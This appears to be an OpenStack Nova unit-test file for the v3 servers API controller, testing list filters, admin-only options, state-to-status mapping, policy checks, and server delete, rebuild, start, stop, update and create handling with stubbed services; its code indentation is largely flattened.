self.assertIn('vm_state', search_opts)
self.assertEqual(search_opts['vm_state'], [vm_states.ACTIVE])
db_list = [fakes.stub_instance(100, uuid=server_uuid)]
return instance_obj._make_instance_list(
context, objects.InstanceList(), db_list, FIELDS)
self.stubs.Set(compute_api.API, 'get_all', fake_get_all)
req = fakes.HTTPRequestV3.blank('/servers?status=active')
servers = self.controller.index(req)['servers']
self.assertEqual(len(servers), 1)
self.assertEqual(servers[0]['id'], server_uuid)
def test_get_servers_allows_task_status(self):
server_uuid = str(uuid.uuid4())
task_state = task_states.REBOOTING
def fake_get_all(compute_self, context, search_opts=None,
sort_key=None, sort_dir='desc',
limit=None, marker=None, want_objects=False,
expected_attrs=None):
self.assertIsNotNone(search_opts)
self.assertIn('task_state', search_opts)
self.assertEqual([task_states.REBOOT_PENDING,
task_states.REBOOT_STARTED,
task_states.REBOOTING],
search_opts['task_state'])
db_list = [fakes.stub_instance(100, uuid=server_uuid,
task_state=task_state)]
return instance_obj._make_instance_list(
context, objects.InstanceList(), db_list, FIELDS)
self.stubs.Set(compute_api.API, 'get_all', fake_get_all)
req = fakes.HTTPRequestV3.blank('/servers?status=reboot')
servers = self.controller.index(req)['servers']
self.assertEqual(len(servers), 1)
self.assertEqual(servers[0]['id'], server_uuid)
def test_get_servers_resize_status(self):
# Test when resize status, it maps list of vm states.
server_uuid = str(uuid.uuid4())
def fake_get_all(compute_self, context, search_opts=None,
sort_key=None, sort_dir='desc',
limit=None, marker=None, want_objects=False,
expected_attrs=None):
self.assertIn('vm_state', search_opts)
self.assertEqual(search_opts['vm_state'],
[vm_states.ACTIVE, vm_states.STOPPED])
db_list = [fakes.stub_instance(100, uuid=server_uuid)]
return instance_obj._make_instance_list(
context, objects.InstanceList(), db_list, FIELDS)
self.stubs.Set(compute_api.API, 'get_all', fake_get_all)
req = fakes.HTTPRequestV3.blank('/servers?status=resize')
servers = self.controller.detail(req)['servers']
self.assertEqual(len(servers), 1)
self.assertEqual(servers[0]['id'], server_uuid)
def test_get_servers_invalid_status(self):
# Test getting servers by invalid status.
req = fakes.HTTPRequestV3.blank('/servers?status=baloney',
use_admin_context=False)
servers = self.controller.index(req)['servers']
self.assertEqual(len(servers), 0)
def test_get_servers_deleted_status_as_user(self):
req = fakes.HTTPRequestV3.blank('/servers?status=deleted',
use_admin_context=False)
self.assertRaises(webob.exc.HTTPForbidden,
self.controller.detail, req)
def test_get_servers_deleted_status_as_admin(self):
server_uuid = str(uuid.uuid4())
def fake_get_all(compute_self, context, search_opts=None,
sort_key=None, sort_dir='desc',
limit=None, marker=None, want_objects=False,
expected_attrs=None):
self.assertIn('vm_state', search_opts)
self.assertEqual(search_opts['vm_state'], ['deleted'])
db_list = [fakes.stub_instance(100, uuid=server_uuid)]
return instance_obj._make_instance_list(
context, objects.InstanceList(), db_list, FIELDS)
self.stubs.Set(compute_api.API, 'get_all', fake_get_all)
req = fakes.HTTPRequestV3.blank('/servers?status=deleted',
use_admin_context=True)
servers = self.controller.detail(req)['servers']
self.assertEqual(len(servers), 1)
self.assertEqual(servers[0]['id'], server_uuid)
def test_get_servers_allows_name(self):
server_uuid = str(uuid.uuid4())
def fake_get_all(compute_self, context, search_opts=None,
sort_key=None, sort_dir='desc',
limit=None, marker=None, want_objects=False,
expected_attrs=None):
self.assertIsNotNone(search_opts)
self.assertIn('name', search_opts)
self.assertEqual(search_opts['name'], 'whee.*')
db_list = [fakes.stub_instance(100, uuid=server_uuid)]
return instance_obj._make_instance_list(
context, objects.InstanceList(), db_list, FIELDS)
self.stubs.Set(compute_api.API, 'get_all', fake_get_all)
req = fakes.HTTPRequestV3.blank('/servers?name=whee.*')
servers = self.controller.index(req)['servers']
self.assertEqual(len(servers), 1)
self.assertEqual(servers[0]['id'], server_uuid)
def test_get_servers_allows_changes_since(self):
server_uuid = str(uuid.uuid4())
def fake_get_all(compute_self, context, search_opts=None,
sort_key=None, sort_dir='desc',
limit=None, marker=None, want_objects=False,
expected_attrs=None):
self.assertIsNotNone(search_opts)
self.assertIn('changes-since', search_opts)
changes_since = datetime.datetime(2011, 1, 24, 17, 8, 1,
tzinfo=iso8601.iso8601.UTC)
self.assertEqual(search_opts['changes-since'], changes_since)
self.assertNotIn('deleted', search_opts)
db_list = [fakes.stub_instance(100, uuid=server_uuid)]
return instance_obj._make_instance_list(
context, objects.InstanceList(), db_list, FIELDS)
self.stubs.Set(compute_api.API, 'get_all', fake_get_all)
params = 'changes-since=2011-01-24T17:08:01Z'
req = fakes.HTTPRequestV3.blank('/servers?%s' % params)
servers = self.controller.index(req)['servers']
self.assertEqual(len(servers), 1)
self.assertEqual(servers[0]['id'], server_uuid)
def test_get_servers_allows_changes_since_bad_value(self):
params = 'changes-since=asdf'
req = fakes.HTTPRequestV3.blank('/servers?%s' % params)
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.index, req)
def test_get_servers_admin_filters_as_user(self):
"""Test getting servers by admin-only or unknown options when
context is not admin. Make sure the admin and unknown options
are stripped before they get to compute_api.get_all()
"""
server_uuid = str(uuid.uuid4())
def fake_get_all(compute_self, context, search_opts=None,
sort_key=None, sort_dir='desc',
limit=None, marker=None, want_objects=False,
expected_attrs=None):
self.assertIsNotNone(search_opts)
# Allowed by user
self.assertIn('name', search_opts)
self.assertIn('ip', search_opts)
# OSAPI converts status to vm_state
self.assertIn('vm_state', search_opts)
# Allowed only by admins with admin API on
self.assertNotIn('unknown_option', search_opts)
db_list = [fakes.stub_instance(100, uuid=server_uuid)]
return instance_obj._make_instance_list(
context, objects.InstanceList(), db_list, FIELDS)
self.stubs.Set(compute_api.API, 'get_all', fake_get_all)
query_str = "name=foo&ip=10.*&status=active&unknown_option=meow"
req = fakes.HTTPRequest.blank('/servers?%s' % query_str)
res = self.controller.index(req)
servers = res['servers']
self.assertEqual(len(servers), 1)
self.assertEqual(servers[0]['id'], server_uuid)
def test_get_servers_admin_options_as_admin(self):
"""Test getting servers by admin-only or unknown options when
context is admin. All options should be passed
"""
server_uuid = str(uuid.uuid4())
def fake_get_all(compute_self, context, search_opts=None,
sort_key=None, sort_dir='desc',
limit=None, marker=None, want_objects=False,
expected_attrs=None):
self.assertIsNotNone(search_opts)
# Allowed by user
self.assertIn('name', search_opts)
# OSAPI converts status to vm_state
self.assertIn('vm_state', search_opts)
# Allowed only by admins with admin API on
self.assertIn('ip', search_opts)
self.assertIn('unknown_option', search_opts)
db_list = [fakes.stub_instance(100, uuid=server_uuid)]
return instance_obj._make_instance_list(
context, objects.InstanceList(), db_list, FIELDS)
self.stubs.Set(compute_api.API, 'get_all', fake_get_all)
query_str = "name=foo&ip=10.*&status=active&unknown_option=meow"
req = fakes.HTTPRequestV3.blank('/servers?%s' % query_str,
use_admin_context=True)
servers = self.controller.index(req)['servers']
self.assertEqual(len(servers), 1)
self.assertEqual(servers[0]['id'], server_uuid)
def test_get_servers_allows_ip(self):
"""Test getting servers by ip."""
server_uuid = str(uuid.uuid4())
def fake_get_all(compute_self, context, search_opts=None,
sort_key=None, sort_dir='desc',
limit=None, marker=None, want_objects=False,
expected_attrs=None):
self.assertIsNotNone(search_opts)
self.assertIn('ip', search_opts)
self.assertEqual(search_opts['ip'], '10\..*')
db_list = [fakes.stub_instance(100, uuid=server_uuid)]
return instance_obj._make_instance_list(
context, objects.InstanceList(), db_list, FIELDS)
self.stubs.Set(compute_api.API, 'get_all', fake_get_all)
req = fakes.HTTPRequestV3.blank('/servers?ip=10\..*')
servers = self.controller.index(req)['servers']
self.assertEqual(len(servers), 1)
self.assertEqual(servers[0]['id'], server_uuid)
def test_get_servers_admin_allows_ip6(self):
"""Test getting servers by ip6 with admin_api enabled and
admin context
"""
server_uuid = str(uuid.uuid4())
def fake_get_all(compute_self, context, search_opts=None,
sort_key=None, sort_dir='desc',
limit=None, marker=None, want_objects=False,
expected_attrs=None):
self.assertIsNotNone(search_opts)
self.assertIn('ip6', search_opts)
self.assertEqual(search_opts['ip6'], 'ffff.*')
db_list = [fakes.stub_instance(100, uuid=server_uuid)]
return instance_obj._make_instance_list(
context, objects.InstanceList(), db_list, FIELDS)
self.stubs.Set(compute_api.API, 'get_all', fake_get_all)
req = fakes.HTTPRequestV3.blank('/servers?ip6=ffff.*',
use_admin_context=True)
servers = self.controller.index(req)['servers']
self.assertEqual(len(servers), 1)
self.assertEqual(servers[0]['id'], server_uuid)
def test_get_all_server_details(self):
expected_flavor = {
"id": "1",
"links": [
{
"rel": "bookmark",
"href": 'http://localhost/flavors/1',
},
],
}
expected_image = {
"id": "10",
"links": [
{
"rel": "bookmark",
"href": 'http://localhost/images/10',
},
],
}
req = fakes.HTTPRequestV3.blank('/servers/detail')
res_dict = self.controller.detail(req)
for i, s in enumerate(res_dict['servers']):
self.assertEqual(s['id'], fakes.get_fake_uuid(i))
self.assertEqual(s['hostId'], '')
self.assertEqual(s['name'], 'server%d' % (i + 1))
self.assertEqual(s['image'], expected_image)
self.assertEqual(s['flavor'], expected_flavor)
self.assertEqual(s['status'], 'BUILD')
self.assertEqual(s['metadata']['seq'], str(i + 1))
def test_get_all_server_details_with_host(self):
"""We want to make sure that if two instances are on the same host,
then they return the same hostId. If two instances are on different
hosts, they should return different hostIds. In this test,
there are 5 instances - 2 on one host and 3 on another.
"""
def return_servers_with_host(context, *args, **kwargs):
return [fakes.stub_instance(i + 1, 'fake', 'fake', host=i % 2,
uuid=fakes.get_fake_uuid(i))
for i in xrange(5)]
self.stubs.Set(db, 'instance_get_all_by_filters',
return_servers_with_host)
req = fakes.HTTPRequestV3.blank('/servers/detail')
res_dict = self.controller.detail(req)
server_list = res_dict['servers']
host_ids = [server_list[0]['hostId'], server_list[1]['hostId']]
self.assertTrue(host_ids[0] and host_ids[1])
self.assertNotEqual(host_ids[0], host_ids[1])
for i, s in enumerate(server_list):
self.assertEqual(s['id'], fakes.get_fake_uuid(i))
self.assertEqual(s['hostId'], host_ids[i % 2])
self.assertEqual(s['name'], 'server%d' % (i + 1))
def test_get_servers_joins_pci_devices(self):
self.expected_attrs = None
def fake_get_all(compute_self, context, search_opts=None,
sort_key=None, sort_dir='desc',
limit=None, marker=None, want_objects=False,
expected_attrs=None):
self.expected_attrs = expected_attrs
return []
self.stubs.Set(compute_api.API, 'get_all', fake_get_all)
req = fakes.HTTPRequestV3.blank('/servers', use_admin_context=True)
self.assertIn('servers', self.controller.index(req))
self.assertIn('pci_devices', self.expected_attrs)
class ServersControllerDeleteTest(ControllerTest):
def setUp(self):
super(ServersControllerDeleteTest, self).setUp()
self.server_delete_called = False
def instance_destroy_mock(*args, **kwargs):
self.server_delete_called = True
deleted_at = timeutils.utcnow()
return fake_instance.fake_db_instance(deleted_at=deleted_at)
self.stubs.Set(db, 'instance_destroy', instance_destroy_mock)
def _create_delete_request(self, uuid):
fakes.stub_out_instance_quota(self.stubs, 0, 10)
req = fakes.HTTPRequestV3.blank('/servers/%s' % uuid)
req.method = 'DELETE'
return req
def _delete_server_instance(self, uuid=FAKE_UUID):
req = self._create_delete_request(uuid)
self.stubs.Set(db, 'instance_get_by_uuid',
fakes.fake_instance_get(vm_state=vm_states.ACTIVE))
self.controller.delete(req, uuid)
def test_delete_server_instance(self):
self._delete_server_instance()
self.assertTrue(self.server_delete_called)
def test_delete_server_instance_not_found(self):
self.assertRaises(webob.exc.HTTPNotFound,
self._delete_server_instance,
uuid='non-existent-uuid')
def test_delete_server_instance_while_building(self):
req = self._create_delete_request(FAKE_UUID)
self.controller.delete(req, FAKE_UUID)
self.assertTrue(self.server_delete_called)
def test_delete_locked_server(self):
req = self._create_delete_request(FAKE_UUID)
self.stubs.Set(compute_api.API, 'soft_delete',
fakes.fake_actions_to_locked_server)
self.stubs.Set(compute_api.API, 'delete',
fakes.fake_actions_to_locked_server)
self.assertRaises(webob.exc.HTTPConflict, self.controller.delete,
req, FAKE_UUID)
def test_delete_server_instance_while_resize(self):
req = self._create_delete_request(FAKE_UUID)
self.stubs.Set(db, 'instance_get_by_uuid',
fakes.fake_instance_get(vm_state=vm_states.ACTIVE,
task_state=task_states.RESIZE_PREP))
self.controller.delete(req, FAKE_UUID)
# Delete should be allowed in any case, even during resizing,
# because the resize may get stuck.
self.assertTrue(self.server_delete_called)
def test_delete_server_instance_if_not_launched(self):
self.flags(reclaim_instance_interval=3600)
req = fakes.HTTPRequestV3.blank('/servers/%s' % FAKE_UUID)
req.method = 'DELETE'
self.server_delete_called = False
self.stubs.Set(db, 'instance_get_by_uuid',
fakes.fake_instance_get(launched_at=None))
def instance_destroy_mock(*args, **kwargs):
self.server_delete_called = True
deleted_at = timeutils.utcnow()
return fake_instance.fake_db_instance(deleted_at=deleted_at)
self.stubs.Set(db, 'instance_destroy', instance_destroy_mock)
self.controller.delete(req, FAKE_UUID)
# delete() should be called for an instance which has never been active,
# even if reclaim_instance_interval has been set.
self.assertEqual(self.server_delete_called, True)
class ServersControllerRebuildInstanceTest(ControllerTest):
image_uuid = '76fa36fc-c930-4bf3-8c8a-ea2a2420deb6'
image_href = 'http://localhost/v3/fake/images/%s' % image_uuid
def setUp(self):
super(ServersControllerRebuildInstanceTest, self).setUp()
self.stubs.Set(db, 'instance_get_by_uuid',
fakes.fake_instance_get(vm_state=vm_states.ACTIVE))
self.body = {
'rebuild': {
'name': 'new_name',
'imageRef': self.image_href,
'metadata': {
'open': 'stack',
},
},
}
self.req = fakes.HTTPRequest.blank('/fake/servers/a/action')
self.req.method = 'POST'
self.req.headers["content-type"] = "application/json"
def test_rebuild_instance_with_blank_metadata_key(self):
self.body['rebuild']['metadata'][''] = 'world'
self.req.body = jsonutils.dumps(self.body)
self.assertRaises(exception.ValidationError,
self.controller._action_rebuild,
self.req, FAKE_UUID, body=self.body)
def test_rebuild_instance_with_metadata_key_too_long(self):
self.body['rebuild']['metadata'][('a' * 260)] = 'world'
self.req.body = jsonutils.dumps(self.body)
self.assertRaises(exception.ValidationError,
self.controller._action_rebuild,
self.req, FAKE_UUID, body=self.body)
def test_rebuild_instance_with_metadata_value_too_long(self):
self.body['rebuild']['metadata']['key1'] = ('a' * 260)
self.req.body = jsonutils.dumps(self.body)
self.assertRaises(exception.ValidationError,
self.controller._action_rebuild, self.req,
FAKE_UUID, body=self.body)
def test_rebuild_instance_with_metadata_value_not_string(self):
self.body['rebuild']['metadata']['key1'] = 1
self.req.body = jsonutils.dumps(self.body)
self.assertRaises(exception.ValidationError,
self.controller._action_rebuild, self.req,
FAKE_UUID, body=self.body)
def test_rebuild_instance_fails_when_min_ram_too_small(self):
# make min_ram larger than our instance ram size
def fake_get_image(self, context, image_href, **kwargs):
return dict(id='76fa36fc-c930-4bf3-8c8a-ea2a2420deb6',
name='public image', is_public=True,
status='active', properties={'key1': 'value1'},
min_ram="4096", min_disk="10")
self.stubs.Set(fake._FakeImageService, 'show', fake_get_image)
self.req.body = jsonutils.dumps(self.body)
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller._action_rebuild,
self.req, FAKE_UUID, body=self.body)
def test_rebuild_instance_fails_when_min_disk_too_small(self):
# make min_disk larger than our instance disk size
def fake_get_image(self, context, image_href, **kwargs):
return dict(id='76fa36fc-c930-4bf3-8c8a-ea2a2420deb6',
name='public image', is_public=True,
status='active', properties={'key1': 'value1'},
min_ram="128", min_disk="100000")
self.stubs.Set(fake._FakeImageService, 'show', fake_get_image)
self.req.body = jsonutils.dumps(self.body)
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller._action_rebuild, self.req,
FAKE_UUID, body=self.body)
def test_rebuild_instance_image_too_large(self):
# make image size larger than our instance disk size
size = str(1000 * (1024 ** 3))
def fake_get_image(self, context, image_href, **kwargs):
return dict(id='76fa36fc-c930-4bf3-8c8a-ea2a2420deb6',
name='public image', is_public=True,
status='active', size=size)
self.stubs.Set(fake._FakeImageService, 'show', fake_get_image)
self.req.body = jsonutils.dumps(self.body)
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller._action_rebuild,
self.req, FAKE_UUID, body=self.body)
def test_rebuild_instance_name_all_blank(self):
def fake_get_image(self, context, image_href, **kwargs):
return dict(id='76fa36fc-c930-4bf3-8c8a-ea2a2420deb6',
name='public image', is_public=True, status='active')
self.stubs.Set(fake._FakeImageService, 'show', fake_get_image)
self.body['rebuild']['name'] = ' '
self.req.body = jsonutils.dumps(self.body)
self.assertRaises(exception.ValidationError,
self.controller._action_rebuild,
self.req, FAKE_UUID, body=self.body)
def test_rebuild_instance_with_deleted_image(self):
def fake_get_image(self, context, image_href, **kwargs):
return dict(id='76fa36fc-c930-4bf3-8c8a-ea2a2420deb6',
name='public image', is_public=True,
status='DELETED')
self.stubs.Set(fake._FakeImageService, 'show', fake_get_image)
self.req.body = jsonutils.dumps(self.body)
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller._action_rebuild,
self.req, FAKE_UUID, body=self.body)
def test_rebuild_instance_onset_file_limit_over_quota(self):
def fake_get_image(self, context, image_href, **kwargs):
return dict(id='76fa36fc-c930-4bf3-8c8a-ea2a2420deb6',
name='public image', is_public=True, status='active')
with contextlib.nested(
mock.patch.object(fake._FakeImageService, 'show',
side_effect=fake_get_image),
mock.patch.object(self.controller.compute_api, 'rebuild',
side_effect=exception.OnsetFileLimitExceeded)
) as (
show_mock, rebuild_mock
):
self.req.body = jsonutils.dumps(self.body)
self.assertRaises(webob.exc.HTTPForbidden,
self.controller._action_rebuild,
self.req, FAKE_UUID, body=self.body)
def test_start(self):
self.mox.StubOutWithMock(compute_api.API, 'start')
compute_api.API.start(mox.IgnoreArg(), mox.IgnoreArg())
self.mox.ReplayAll()
req = fakes.HTTPRequestV3.blank('/servers/%s/action' % FAKE_UUID)
body = dict(start="")
self.controller._start_server(req, FAKE_UUID, body)
def test_start_policy_failed(self):
rules = {
"compute:v3:servers:start":
common_policy.parse_rule("project_id:non_fake")
}
policy.set_rules(rules)
req = fakes.HTTPRequestV3.blank('/servers/%s/action' % FAKE_UUID)
body = dict(start="")
exc = self.assertRaises(exception.PolicyNotAuthorized,
self.controller._start_server,
req, FAKE_UUID, body)
self.assertIn("compute:v3:servers:start", exc.format_message())
def test_start_not_ready(self):
self.stubs.Set(compute_api.API, 'start', fake_start_stop_not_ready)
req = fakes.HTTPRequestV3.blank('/servers/%s/action' % FAKE_UUID)
body = dict(start="")
self.assertRaises(webob.exc.HTTPConflict,
self.controller._start_server, req, FAKE_UUID, body)
def test_start_locked_server(self):
self.stubs.Set(compute_api.API, 'start',
fakes.fake_actions_to_locked_server)
req = fakes.HTTPRequestV3.blank('/servers/%s/action' % FAKE_UUID)
body = dict(start="")
self.assertRaises(webob.exc.HTTPConflict,
self.controller._start_server, req, FAKE_UUID, body)
def test_start_invalid(self):
self.stubs.Set(compute_api.API, 'start', fake_start_stop_invalid_state)
req = fakes.HTTPRequestV3.blank('/servers/%s/action' % FAKE_UUID)
body = dict(start="")
self.assertRaises(webob.exc.HTTPConflict,
self.controller._start_server, req, FAKE_UUID, body)
def test_stop(self):
self.mox.StubOutWithMock(compute_api.API, 'stop')
compute_api.API.stop(mox.IgnoreArg(), mox.IgnoreArg())
self.mox.ReplayAll()
req = fakes.HTTPRequestV3.blank('/servers/%s/action' % FAKE_UUID)
body = dict(stop="")
self.controller._stop_server(req, FAKE_UUID, body)
def test_stop_policy_failed(self):
rules = {
"compute:v3:servers:stop":
common_policy.parse_rule("project_id:non_fake")
}
policy.set_rules(rules)
req = fakes.HTTPRequestV3.blank('/servers/%s/action' % FAKE_UUID)
body = dict(stop='')
exc = self.assertRaises(exception.PolicyNotAuthorized,
self.controller._stop_server,
req, FAKE_UUID, body)
self.assertIn("compute:v3:servers:stop", exc.format_message())
def test_stop_not_ready(self):
self.stubs.Set(compute_api.API, 'stop', fake_start_stop_not_ready)
req = fakes.HTTPRequestV3.blank('/servers/%s/action' % FAKE_UUID)
body = dict(stop="")
self.assertRaises(webob.exc.HTTPConflict,
self.controller._stop_server, req, FAKE_UUID, body)
def test_stop_locked_server(self):
self.stubs.Set(compute_api.API, 'stop',
fakes.fake_actions_to_locked_server)
req = fakes.HTTPRequestV3.blank('/servers/%s/action' % FAKE_UUID)
body = dict(stop="")
self.assertRaises(webob.exc.HTTPConflict,
self.controller._stop_server, req, FAKE_UUID, body)
def test_stop_invalid_state(self):
self.stubs.Set(compute_api.API, 'stop', fake_start_stop_invalid_state)
req = fakes.HTTPRequestV3.blank('/servers/%s/action' % FAKE_UUID)
body = dict(start="")
self.assertRaises(webob.exc.HTTPConflict,
self.controller._stop_server, req, FAKE_UUID, body)
def test_start_with_bogus_id(self):
self.stubs.Set(db, 'instance_get_by_uuid',
fake_instance_get_by_uuid_not_found)
req = fakes.HTTPRequestV3.blank('/servers/test_inst/action')
body = dict(start="")
self.assertRaises(webob.exc.HTTPNotFound,
self.controller._start_server, req, 'test_inst', body)
def test_stop_with_bogus_id(self):
self.stubs.Set(db, 'instance_get_by_uuid',
fake_instance_get_by_uuid_not_found)
req = fakes.HTTPRequestV3.blank('/servers/test_inst/action')
body = dict(stop="")
self.assertRaises(webob.exc.HTTPNotFound,
self.controller._stop_server, req, 'test_inst', body)
class ServersControllerUpdateTest(ControllerTest):
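    """Tests for updating server attributes via PUT /servers/<id>."""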
def _get_request(self, body=None, options=None):
if options:
self.stubs.Set(db, 'instance_get',
fakes.fake_instance_get(**options))
req = fakes.HTTPRequestV3.blank('/servers/%s' % FAKE_UUID)
req.method = 'PUT'
req.content_type = 'application/json'
req.body = jsonutils.dumps(body)
return req
def test_update_server_all_attributes(self):
body = {'server': {
'name': 'server_test',
}}
req = self._get_request(body, {'name': 'server_test'})
res_dict = self.controller.update(req, FAKE_UUID, body=body)
self.assertEqual(res_dict['server']['id'], FAKE_UUID)
self.assertEqual(res_dict['server']['name'], 'server_test')
def test_update_server_name(self):
body = {'server': {'name': 'server_test'}}
req = self._get_request(body, {'name': 'server_test'})
res_dict = self.controller.update(req, FAKE_UUID, body=body)
self.assertEqual(res_dict['server']['id'], FAKE_UUID)
self.assertEqual(res_dict['server']['name'], 'server_test')
def test_update_server_name_too_long(self):
body = {'server': {'name': 'x' * 256}}
req = self._get_request(body, {'name': 'server_test'})
self.assertRaises(exception.ValidationError, self.controller.update,
req, FAKE_UUID, body=body)
def test_update_server_name_all_blank_spaces(self):
self.stubs.Set(db, 'instance_get',
fakes.fake_instance_get(name='server_test'))
req = fakes.HTTPRequest.blank('/v3/servers/%s' % FAKE_UUID)
req.method = 'PUT'
req.content_type = 'application/json'
body = {'server': {'name': ' ' * 64}}
req.body = jsonutils.dumps(body)
self.assertRaises(exception.ValidationError, self.controller.update,
req, FAKE_UUID, body=body)
def test_update_server_admin_password_ignored(self):
inst_dict = dict(name='server_test', admin_password='bacon')
body = dict(server=inst_dict)
def server_update(context, id, params):
filtered_dict = {
'display_name': 'server_test',
}
self.assertEqual(params, filtered_dict)
filtered_dict['uuid'] = id
return filtered_dict
self.stubs.Set(db, 'instance_update', server_update)
# FIXME (comstud)
# self.stubs.Set(db, 'instance_get',
# return_server_with_attributes(name='server_test'))
req = fakes.HTTPRequest.blank('/fake/servers/%s' % FAKE_UUID)
req.method = 'PUT'
req.content_type = "application/json"
req.body = jsonutils.dumps(body)
res_dict = self.controller.update(req, FAKE_UUID, body=body)
self.assertEqual(res_dict['server']['id'], FAKE_UUID)
self.assertEqual(res_dict['server']['name'], 'server_test')
def test_update_server_not_found(self):
def fake_get(*args, **kwargs):
raise exception.InstanceNotFound(instance_id='fake')
self.stubs.Set(compute_api.API, 'get', fake_get)
body = {'server': {'name': 'server_test'}}
req = self._get_request(body)
self.assertRaises(webob.exc.HTTPNotFound, self.controller.update,
req, FAKE_UUID, body=body)
def test_update_server_not_found_on_update(self):
def fake_update(*args, **kwargs):
raise exception.InstanceNotFound(instance_id='fake')
self.stubs.Set(db, 'instance_update_and_get_original', fake_update)
body = {'server': {'name': 'server_test'}}
req = self._get_request(body)
self.assertRaises(webob.exc.HTTPNotFound, self.controller.update,
req, FAKE_UUID, body=body)
def test_update_server_policy_fail(self):
rule = {'compute:update': common_policy.parse_rule('role:admin')}
policy.set_rules(rule)
body = {'server': {'name': 'server_test'}}
req = self._get_request(body, {'name': 'server_test'})
self.assertRaises(exception.PolicyNotAuthorized,
self.controller.update, req, FAKE_UUID, body=body)
class ServerStatusTest(test.TestCase):
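    """Tests vm_state/task_state to API status mapping and action policy checks."""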
def setUp(self):
super(ServerStatusTest, self).setUp()
fakes.stub_out_nw_api(self.stubs)
ext_info = plugins.LoadedExtensionInfo()
self.controller = servers.ServersController(extension_info=ext_info)
def _get_with_state(self, vm_state, task_state=None):
self.stubs.Set(db, 'instance_get_by_uuid',
fakes.fake_instance_get(vm_state=vm_state,
task_state=task_state))
request = fakes.HTTPRequestV3.blank('/servers/%s' % FAKE_UUID)
return self.controller.show(request, FAKE_UUID)
def test_active(self):
response = self._get_with_state(vm_states.ACTIVE)
self.assertEqual(response['server']['status'], 'ACTIVE')
def test_reboot(self):
response = self._get_with_state(vm_states.ACTIVE,
task_states.REBOOTING)
self.assertEqual(response['server']['status'], 'REBOOT')
def test_reboot_hard(self):
response = self._get_with_state(vm_states.ACTIVE,
task_states.REBOOTING_HARD)
self.assertEqual(response['server']['status'], 'HARD_REBOOT')
def test_reboot_resize_policy_fail(self):
def fake_get_server(context, req, id):
return fakes.stub_instance(id)
self.stubs.Set(self.controller, '_get_server', fake_get_server)
rule = {'compute:reboot':
common_policy.parse_rule('role:admin')}
policy.set_rules(rule)
req = fakes.HTTPRequestV3.blank('/servers/1234/action')
self.assertRaises(exception.PolicyNotAuthorized,
self.controller._action_reboot, req, '1234',
{'reboot': {'type': 'HARD'}})
def test_rebuild(self):
response = self._get_with_state(vm_states.ACTIVE,
task_states.REBUILDING)
self.assertEqual(response['server']['status'], 'REBUILD')
def test_rebuild_error(self):
response = self._get_with_state(vm_states.ERROR)
self.assertEqual(response['server']['status'], 'ERROR')
def test_resize(self):
response = self._get_with_state(vm_states.ACTIVE,
task_states.RESIZE_PREP)
self.assertEqual(response['server']['status'], 'RESIZE')
def test_confirm_resize_policy_fail(self):
def fake_get_server(context, req, id):
return fakes.stub_instance(id)
self.stubs.Set(self.controller, '_get_server', fake_get_server)
rule = {'compute:confirm_resize':
common_policy.parse_rule('role:admin')}
policy.set_rules(rule)
req = fakes.HTTPRequestV3.blank('/servers/1234/action')
self.assertRaises(exception.PolicyNotAuthorized,
self.controller._action_confirm_resize, req, '1234', {})
def test_verify_resize(self):
response = self._get_with_state(vm_states.RESIZED, None)
self.assertEqual(response['server']['status'], 'VERIFY_RESIZE')
def test_revert_resize(self):
response = self._get_with_state(vm_states.RESIZED,
task_states.RESIZE_REVERTING)
self.assertEqual(response['server']['status'], 'REVERT_RESIZE')
def test_revert_resize_policy_fail(self):
def fake_get_server(context, req, id):
return fakes.stub_instance(id)
self.stubs.Set(self.controller, '_get_server', fake_get_server)
rule = {'compute:revert_resize':
common_policy.parse_rule('role:admin')}
policy.set_rules(rule)
req = fakes.HTTPRequestV3.blank('/servers/1234/action')
self.assertRaises(exception.PolicyNotAuthorized,
self.controller._action_revert_resize, req, '1234', {})
def test_password_update(self):
response = self._get_with_state(vm_states.ACTIVE,
task_states.UPDATING_PASSWORD)
self.assertEqual(response['server']['status'], 'PASSWORD')
def test_stopped(self):
response = self._get_with_state(vm_states.STOPPED)
self.assertEqual(response['server']['status'], 'SHUTOFF')
class ServersControllerCreateTest(test.TestCase):
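    """Tests for creating servers via POST /servers."""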
image_uuid = '76fa36fc-c930-4bf3-8c8a-ea2a2420deb6'
flavor_ref = 'http://localhost/123/flavors/3'
def setUp(self):
"""Shared implementation for tests below that create instance."""
super(ServersControllerCreateTest, self).setUp()
self.flags(verbose=True,
enable_instance_password=True)
self.instance_cache_num = 0
self.instance_cache_by_id = {}
self.instance_cache_by_uuid = {}
fakes.stub_out_nw_api(self.stubs)
ext_info = plugins.LoadedExtensionInfo()
self.controller = servers.ServersController(extension_info=ext_info)
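        # The DB and network stubs below keep state in in-memory caches so
        # the tests run without a real database.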
def instance_create(context, inst):
inst_type = flavors.get_flavor_by_flavor_id(3)
image_uuid = '76fa36fc-c930-4bf3-8c8a-ea2a2420deb6'
def_image_ref = 'http://localhost/images/%s' % image_uuid
self.instance_cache_num += 1
instance = fake_instance.fake_db_instance(**{
'id': self.instance_cache_num,
'display_name': inst['display_name'] or 'test',
'uuid': FAKE_UUID,
'instance_type': dict(inst_type),
'image_ref': inst.get('image_ref', def_image_ref),
'user_id': 'fake',
'project_id': 'fake',
'reservation_id': inst['reservation_id'],
"created_at": datetime.datetime(2010, 10, 10, 12, 0, 0),
"updated_at": datetime.datetime(2010, 11, 11, 11, 0, 0),
"config_drive": None,
"progress": 0,
"fixed_ips": [],
"task_state": "",
"vm_state": "",
"root_device_name": inst.get('root_device_name', 'vda'),
})
self.instance_cache_by_id[instance['id']] = instance
self.instance_cache_by_uuid[instance['uuid']] = instance
return instance
def instance_get(context, instance_id):
"""Stub for compute/api create() pulling in instance after
scheduling
"""
return self.instance_cache_by_id[instance_id]
def instance_update(context, uuid, values):
instance = self.instance_cache_by_uuid[uuid]
instance.update(values)
return instance
def server_update(context, instance_uuid, params, update_cells=True):
inst = self.instance_cache_by_uuid[instance_uuid]
inst.update(params)
return inst
def server_update_and_get_original(
context, instance_uuid, params, update_cells=False,
columns_to_join=None):
inst = self.instance_cache_by_uuid[instance_uuid]
inst.update(params)
return (inst, inst)
def fake_method(*args, **kwargs):
pass
def project_get_networks(context, user_id):
return dict(id='1', host='localhost')
def queue_get_for(context, *args):
return 'network_topic'
fakes.stub_out_rate_limiting(self.stubs)
fakes.stub_out_key_pair_funcs(self.stubs)
fake.stub_out_image_service(self.stubs)
self.stubs.Set(uuid, 'uuid4', fake_gen_uuid)
